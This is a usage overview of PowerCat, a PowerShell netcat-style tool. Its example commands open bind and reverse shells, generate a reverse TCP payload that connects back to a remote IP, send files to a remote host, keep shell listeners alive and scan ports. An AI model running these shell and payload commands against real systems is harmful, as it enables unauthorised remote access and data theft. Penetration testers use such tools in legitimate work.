Project URL

https://github.com/secabstraction/PowerCat

Project overview

PowerCat is a TCP/IP Swiss army knife written in PowerShell. It can be thought of as a PowerShell implementation of ncat, with many useful features added on top, such as file transfer, SMB protocol support, relay mode, payload generation, and port scanning.

Usage

The supported commands and their parameters are as follows:

Start-PowerCat # Starts a listener/server.

-Mode # Defaults to Tcp, can also specify Udp or Smb.
-Port # The port to listen on.
-PipeName # Name of pipe to listen on.

-SslCn # Common name for Ssl encrypting Tcp.
-Relay # Format: "<Mode>:<Port/PipeName>"
-Execute # Execute a console process or powershell.
-SendFile # Filepath of file to send.
-ReceiveFile # Filepath of file to be written.
-Disconnect # Disconnect after connecting.
-KeepAlive # Restart after disconnecting.
-Timeout # Timeout option. Default: 60 seconds

Connect-PowerCat # Connects a client to a listener/server.

-Mode # Defaults to Tcp, can also specify Udp or Smb.
-RemoteIp # IPv4 address of host to connect to.
-Port # The port to connect to.
-PipeName # Name of pipe to connect to.

-SslCn # Common name for Ssl encrypting Tcp.
-Relay # Format: "<Mode>:<IP>:<Port/PipeName>"
-Execute # Execute a console process or powershell.
-SendFile # Filepath of file to send.
-ReceiveFile # Filepath of file to be written.
-Disconnect # Disconnect after connecting.
-Timeout # Timeout option. Default: 60 seconds

Basic listen and connect modes:

# Basic Listener:
Start-PowerCat -Port 443

# Basic Client:
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443

Sending and receiving files

# Send File:
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -SendFile C:\pathto\inputfile

# Receive File:
Start-PowerCat -Port 443 -ReceiveFile C:\pathto\outputfile

Bind and reverse shells

# Serve a shell:
Start-PowerCat -Port 443 -Execute

# Send a Shell:
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -Execute

Payload generation

# Generate a reverse tcp payload that connects back to 10.1.1.15 port 443:
New-PowerCatPayload -RemoteIp 10.1.1.15 -Port 443 -Execute

# Generate a tcp payload that listens on port 8000:
New-PowerCatPayload -Listener -Port 8000 -Execute

Port scanning

# Basic TCP port scan:
1..1024 | ForEach-Object { Connect-PowerCat -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose -Disconnect }

# Basic UDP port scan:
1..1024 | ForEach-Object { Connect-PowerCat -Mode Udp -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose }

# Persistent listener:
Start-PowerCat -Port 443 -Execute -KeepAlive

# Simple Web Server:
Start-PowerCat -Port 80 -SendFile index.html